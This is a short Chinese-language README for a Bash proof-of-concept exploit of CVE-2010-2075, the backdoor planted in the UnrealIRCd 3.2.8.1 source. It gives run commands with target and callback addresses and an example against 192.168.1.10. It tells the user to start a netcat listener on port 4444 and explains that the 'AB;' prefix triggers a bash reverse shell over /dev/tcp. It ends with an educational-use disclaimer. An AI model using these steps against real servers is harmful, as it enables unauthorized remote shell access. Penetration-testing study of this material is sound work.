
CVE-2010-2075 exploit
针对UnrealIRCd 3.2.8.1源码包中引入的后门的Bash PoC。被篡改的二进制文件会执行发送到IRC端口且以AB;为前缀的任意命令。
chmod +x exploit.sh
./exploit.sh <RHOST> <RPORT> <LHOST> <LPORT>
示例:
./exploit.sh 192.168.1.10 6667 192.168.1.20 4444
运行前先设置监听器:
nc -lvnp 4444
后门会检查传入数据中是否包含前缀AB;,并将剩余部分传递给系统shell。Payload通过/dev/tcp发送一个bash反连shell。
仅限教育和授权测试使用。